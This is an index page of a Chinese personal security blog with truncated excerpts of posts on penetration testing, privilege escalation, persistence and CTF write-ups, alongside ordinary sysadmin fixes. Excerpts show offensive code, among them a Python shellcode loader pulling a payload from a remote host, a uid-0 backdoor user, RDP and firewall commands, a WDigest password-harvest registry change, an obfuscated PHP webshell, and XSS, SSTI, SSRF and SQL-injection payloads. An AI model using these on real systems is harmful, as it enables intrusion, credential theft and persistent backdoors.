HoAd'blog

原创 【网络安全 渗透测试 hw 红队 驻场 面试题 分享】

面试指导，网络安全，面试分享，渗透测试

原创 python的shellcode_loader解释

python的shellcode_loader解释代码loader传到主机执行，shellcode传到自己的服务器上。简单的python shellcode加载器，直接上代码，注释都在代码里代码import ctypesimport requestsimport base64scode = requests.get("http://xxx.xxx.xxx.xxx/base64_python_payload.txt")shellcode = bytearray(base64.b64decod

原创 windows提权总结

windows提权总结内核溢出提权Windows系统配置错误提权系统服务权限配置错误注册表键AlwaysInstallElevated可信任服务路径漏洞自动安装配置文件计划任务Windows组策略首选项提权(SYSVOL/GPP)SYSVOL绕过UAC提权msf的uac模块Nishang中的Invoke-PsUACme.ps1令牌窃取AccessToken的窃取与利用DLL劫持第三方服务提权mssql数据库提权mysql数据库提权内核溢出提权常用溢出提权最常用的本地溢出提权有 CVE-2018-812

原创 图图图图图

原创 linux恶意进程隐藏

https://mp.weixin.qq.com/s/6Z4tErcnusYHTqiSUSVz3Ahttps://blog.csdn.net/nzjdsds/article/details/82919100

原创 linux持久化

linux持久化后门添加超级用户SUID shellalias 后门inetdcrontab后门ssh公钥免密ssh软连接SSH wrapper后门PAM隐身登录隐藏文件Git hooksPROMPT_COMMAND后门PROMPT_COMMAND提权Sudoers “trick”TCP Wrappers进程注入其他一些小技巧bash去掉history记录修改上传文件时间戳伪造Apache日志中的指定IPLinux日志清除添加超级用户echo "user:x:0:0::/:/bin/sh" >&g

原创 虚拟机连不上网解决办法，以及出现Ubuntu connect: Network is unreachable

虚拟机连不上网解决办法，以及出现Ubuntu connect: Network is unreachable问题来源具体过程问题来源出现了Ubuntu connect: Network is unreachable这个问题，看了一下网上的回答，很懵呐，而且要修改的东西太多了。Ubuntu connect: Network is unreachable然后ping了一下baidu.com发现ping不通，应该就是网卡没设置好，翻了半天，我觉得应该就是桥接模式的问题，贴图感觉是这里出了毛病，原来这里

原创 nginx的启动，停止

nginx的启动，停止启动启动代码格式nginx的停止有三种方式：从容停止快速停止强制停止验证nginx配置文件是否正确方法一：进入nginx安装目录sbin下，输入命令./nginx -t方法二：在启动命令-c前加-t重启Nginx服务方法一：进入nginx可执行目录sbin下，输入命令`./nginx -s reload` 即可方法二：查找当前nginx进程号，然后输入命令：`kill -HUP 进程号` 实现重启nginx服务启动启动代码格式nginx安装目录地址 -c nginx配置文件地址

原创 Failed to restart network.service: Unit network.service not found.

【解决】Failed to restart network.service: Unit network.service not found.输入命令时遇到了问题。service network restart使用systemctl restart network 或 service network restart 命令重启网卡失败。解决：1、可以尝试使用以下命令：service network-manager restart2、如果是 Kali Linux（Debian），则需要用以下命

原创 python批量检测域名和url能否打开

python批量检测域名和url能否打开python批量检测域名和url能否打开批量在浏览器中打开url或者域名总结最近在挖src，然后有大量的域名，而且大部分打不开，所以就很浪费时间，写一个这个脚本方便我自己，也方便大家。python批量检测域名和url能否打开用多线程写单线程的东西，哈哈哈。怎么方便怎么来，如果需求大，就多开几个线程就好。python的I/O操作python的多线程python的requests库import timeimport requestsimport thre

原创 redis的安装以及漏洞学习

redis的安装以及漏洞学习redis的安装redis的基本命令redis的一些漏洞redis未授权redis写入文件redis计划任务反弹shell写ssh公钥登录redis主从以上提到的这些漏洞，都是基于未授权访问。redis的安装安装 Rediswget http://download.redis.io/releases/redis-4.0.8.tar.gztar –xvf redis-4.0.8.tar.gzcd redis-4.0.8make修改配置文件 redis.confcp

原创 一些权限的绕过

一些权限的绕过URI绕过后台URI绕过403URI绕过后台这是通过以下方式URI来访问后台的技巧：https://target.com/admin/ –> HTTP 302（重定向到登录页面）https://target.com/admin…;/ –> HTTP 200 OKhttps://target.com/…/adminhttps://target.com/whatever/…;/admintarget.com/admin –> HTTP 302 (重定向到登陆页面

原创 测试点的payload

一些测试点的payload，后续继续补充电子邮件地址图片名字电子邮件地址以下payload都是有效的电子邮件地址XSS（跨站脚本）：test+(<script>alert(0)</script>)@example.comtest@example(<script>alert(0)</script>).com"<script>alert(0)</script>"@example.com模板注入："<%=7 * 7 %&g

原创 ssrf绕过

ssrf绕过当涉及到SSRF（服务器端请求伪造）时，可以使用以下5种有效负载绕过防御：1）使用CIDR绕过SSRF：http://127.127.127.127http://127.0.0.02）使用稀有地址绕行：http://127.1http://03）使用技巧组合绕过：http://1.1.1.1&@2.2.2.2# @3.3.3.3/urllib: 3.3.3.34）绕过弱解析器：http://127.1.1.1:80\@127.2.2.2:80/5）用[

原创 windows下3389端口开启和连接

windows下3389端口开启和连接开启3389的命令关闭防火墙的命令添加用户添加到管理员组特殊情况netstat -ano 查看端口开放情况开启3389的命令REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f关闭防火墙的命令NetSh Advfirewall set allprofiles state off //关闭

原创 xdebug下载与配置，有这一篇就够了

xdebug下载与配置，有这一篇就够了xdebug下载与配置环境步骤一步骤二步骤三步骤四步骤五遇到的问题解决方案第一个坑第二个坑第三个坑xdebug下载与配置下载xdebug的地方https://xdebug.org/找不到对应版本的可以用phpinfo在这个https://xdebug.org/wizard里面去找。先简单说一下我这个环境环境phpstorm和phpstudy_pro(小皮面板)然后php版本是7.3.9下载的xdebug版本是php_xdebug-3.0.4-7.3-vc

原创 thinkphp3.2.3学习(2)

thinkphp3.2.3学习（2） 如何读取配置文件路由四种url模式url的设置函数控制器绑定参数url生成跳转页面重定向输入变量如何读取配置文件使用C函数C(‘属性名’)；动态配置C(‘属性名’，‘属性值’)；扩展配置打开模块配置配置文件‘LOAD_EXT_CONFIG’ => ‘cache’,‘db’同级目录新建cache的db两个php文件扩展书写相关配置配置文件的相关格式return array('DB_PWD' => '123','DB_PORT'

原创 thinkphp3.2.3学习(1)

thinkphp的开发学习MVC结构MVC结构M->model数据模型V->view识图C->controller控制器<?phpreturn array( //'配置项'=>'配置值' /* 数据库设置 */ 'DB_TYPE' => 'mysql', // 数据库类型 'DB_HOST' => 'localhost', // 服务器地址 'DB_NAME'

原创 bypassuac的学习

什么是UAC为什么要绕过他MSF自带的bypassuac模块在Vista及更高版本中通过弹框进一步让用户确认是否授权当前可执行文件来达到阻止恶意程序的目的。为什么要绕过他为了远程执行目标的exe或者bat可执行文件绕过此安全机制，以此叫BypassUAC（就是为了不进行弹窗直接运行执行文件）MSF自带的bypassuac模块通过进程注入使可信任发布者证书绕过Windows UACbypassuac模块exploit/windows/local/bypassuac配置参数，即可绕过uac，切

原创 mimikatz散列值学习

mimikatz散列值学习补丁KB2871997关闭wdigest功能windows server2012 关闭wdigest，无法获取明文密码两种方法开启wdigest 抓取用户的明文密码#使用reg add##开启reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f##关闭reg add HKLM\SYSTE

原创 sudo密码窃取

sudo密码窃取工具链接：https://github.com/ph4ntonn/Impost3rmpost3r是一个利用C语言编写,用来窃取linux下sudo密码的工具。用户可使用此程序在普通用户权限下，制造水坑，窃取合法用户的sudo密码。DNS协议通信使用fdns搭建dns服务端git clone https://github.com/deepdarkness/Fdns编译cd Fdns/srcgcc -o dns main.c util.c运行./dns安装impos

转载 windows下的特殊信息搜集

0x01 路径以下用户均用 administrator 代替，对于不同的 Windows 用户，名字不一，所以通常在不同的 users 目录下。1. 安装软件相关：数据文件路径：C:\Users\administrator\AppData\Roaming该路径多存放着系统上程序的数据文件，可从此处收集，如浏览器历史记录，cookie，用户信息等数据文件。2.QQ 相关：QQ 号目录：C:\Users\administrator\Documents\Tencent FilesQQ 图片缓

原创 csv注入文件

攻击者通过在CSV文件中构造恶意的命令或函数，使得正常用户在使用Excel打开这个CSV文件后恶意的命令或函数被执行，从而造成攻击行为。原因1、CSV文件中的几个特殊符号“+、-、@、=”尝试在CSV单元格中输入“=1+1”，回车后，发现单元格的值变成了2，说明加号被当做运算执行了。除了加号，“-”、“@”、“=”也会被解释为公式。2、DDE（Dynamic Data Exchange）DDE是Windows下进程间通信协议，是一种动态数据交换机制，使用DDE通讯需要两个Windows应用程序，

转载 msf中的getsystem的原理

windows的命名管道命名管道基于smb协议通信用来让两个进程间进行通信，两个进程可以是本地进程，也可以是远程进程，类似于socket连接，是用来传输数据的，可以设置具体的权限让指定权限的进程才能连接命名管道，理论上每个程序都能连接命名管道，只是连接之后能做的事情不同，具体能做什么事跟服务端的配置有关系。命名管道是啥1.命名管道是C/S架构，必须让服务端某个进程先创建命名管道。2.命名管道可以被任何符合权限的进程去访问，且何种权限可以访问是可以自定义的。3.客户端可以是本地的某个进程或者远程的

原创 CentOS修改root密码

CentOS修改root密码CentOS修改root密码CentOS修改root密码步骤1.系统启动时进入系统选择页面按【e】进入步骤2。步骤2.在开头是“linux16”命令最后加上“init=/bin/sh”，按【Ctrl+x】进入单用户模式。步骤3.输入“mount –o remount ,rw /”，将所有文件设置为可读写模式。输入“passwd”，填写新的root密码。输入“ touch /.autorelabel”,修改系统时间标签。输入“exec /sbin/init”重启系统

原创 frp的使用

frp的使用分为客户端和服务端frpc（客户端）放在靶机上面（需要代理出来流量的内网机器）./frpc -c ./frpc.inifrps（服务端）放在攻击机上面./frps-c ./frps.ini./frps-c ./frps.ini >/dev/null 2>&1 & 后台进行执行frps配置[common]bind_port = 7000# 指定 仪表盘控制界面 Dashboard 的监听的 IP 地址 //0.0.0.0 为所以IP均可访问

原创 msf的reverse_tcp和bind_tcp两者的区别

msf的reverse_tcp和bind_tcp两者的区别reverse_tcpbind_tcpreverse_httpreverse_https安全性reverse_tcp攻击机设置一个端口（LPORT）和IP（LHOST），Payload在测试机执行连接攻击机IP的端口，这时如果在攻击机监听该端口会发现测试机已经连接。msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=0.0.0.0 lport=4444 -f elf -o shellbi

原创 PHP一句话 免杀思路 分析

php免杀以及一个免杀的小马分享没什么技术含量，但是主要是学思路小马免杀思路最后后没什么技术含量，但是主要是学思路推荐新手观看小马通过base64编码，然后拆分了函数关键字，通过变量的引用等，然后@不报错，eval不能拆分使用<?php $b=sert;$c=base64_encode($b);$d='as'.base64_decode($c);@$d($_POST['1']);?>很简单，然后还有下面是升级版免杀思路免杀思路异或函数的一个字母用双重加密来绕过弱类

原创 子域名获取

获取更多的子域名谷歌搜索爆破证书DNSJS域传送漏洞三种利用方式遇到404或者403谷歌搜索谷歌语法搜索：site，domain等爆破爆破，通常利用工具，工具很多，不举例子。证书证书搜索：https://crt.shDNSdns搜索：https://dns.bufferover.run/dns?q=baidu.comJSjs文件：通过f12，在源代码里面，可以找到隐藏的子域名链接。域传送漏洞三种利用方式域传送漏洞利用域传送可以得到子域名：三种检测方法nslookup，nmap,di

原创 vulnhub靶机My_file_server_1

My_FILE_SERVER1攻击机：192.168.87.134靶机：192.168.87.139信息搜集用nmap先进行主机发现，使用命令nmap -A -T4 -v 192.168.87.0/24开启的端口：21 22 80 111 445 2049 2121开放了http，ftp，smb，ssh服务访问80端口，没有发现啥有价值的，然后使用御剑，扫到了一个readme.txt一个密码，但是不知道是哪个服务的密码。开启了21端口，匿名访问一下（账号：anonymous 密码：gu

原创 ssti详解与例题以及绕过payload大全

ssti详解与例题以及绕过payload大全[BJDCTF2020]Cookie is so stableuser=1231{{2*4}}判断是不是sstiuser={{system('ls')}}执行命令，但不能成功，，好像是空格不可以{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}这是最后的payloadhttps://0day.work/jinja2

原创 ctfshow web入门 sql注入

ctfshow web入门 sql注入171正常的手工注入过程查数据库1' union select 1,database(),3-- -查表名1' union select 1,table_name,3 from information_schema.tables where table_schema=database() -- -查列名1' union select 1,column_name,3 from information_schema.columns where table

原创 xml实体注入

xml实体注入XXE漏洞即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置，没有对上传的xml文件进行过滤，导致可上传恶意xml文件。- XML被设计为传输和存储数据，其焦点是数据的内容。- HTML被设计用来显示数据，其焦点是数据的外观。&lt &gt &amp &apos &

原创 常见源码泄露

常见源码泄露0x1 .git源码泄露当在一个空目录执行 git init 时，Git 会创建一个 .git 目录。 这个目录包含所有的 Git 存储和操作的对象。 如果想备份或复制一个版本库，只需把这个目录拷贝至另一处就可以了比如某个网站存在.git文件泄露，可以：http://www.baidu.com/.git利用方式： github上的githack可以把整个.git备份的文件下载下来。它能解析 .git/index 文件，并找到工程中所有的：文件名和文件 sha1，然后去 .git/o

原创 ctf中常见的编码和密码收集

常见的编码和密码收集先收集这么多，以后再遇到，立即补充十六进制，八进制，二进制，ascii码福尔摩斯小人密码：每一个跳舞的小人实际上对应的是英文二十六个字母中的一个，而小人手中的旗子则表明该字母是单词的最后一个字母，如果仅仅是一个单词而不是句子，或者是句子中最后的一个单词，则单词中最后一个字母不必举旗。凯撒加密：只需把每个字母都按字母表中的顺序依次后移几个字母即可（都是字符串）变异凯撒：可能会涉及到符号对应的ascii码。凯撒移位(中文版)：就是按照中文字在Unicode编码表中的顺序进行移位，可

原创 ctfshow命令执行之无数字字母

命令执行-无数字字母getshell前言一、无字母命令执行二、无字母数字命令执行总结前言做ctfshow的时候，碰到命令执行的题，发现这两种类型的题很有趣，学到了很多知识。前置知识:shell下可以利用.来执行任意脚本Linux文件名支持用glob通配符代替一、无字母命令执行方法1异或：在PHP中，两个字符串执行异或操作以后，得到的还是一个字符串。所以，我们找到某两个非字母、数字的字符，他们的异或结果是这个字母即可。方法2取反：将汉字(%ff%ff%ff)中的某个字符取出来，来进行取反

原创 CTFshow web AK赛wp

CTFshow WEB AK赛ak赛 wp签到_观己web1_观字web2_观星web3_观图web4_观心总结ak赛 wp签到_观己正则匹配过滤了php，且大小写不敏感，后面又有include函数，已经是对php的伪协议的一个考点。php被过滤，我们可以用data://伪协议发现allow_url_include没有开启，还得另寻他法。做题的时候没想到有日志包含，还是题做得太少了。payload:file=/var/log/nginx/access.log通过将一句话木马写入到UA中&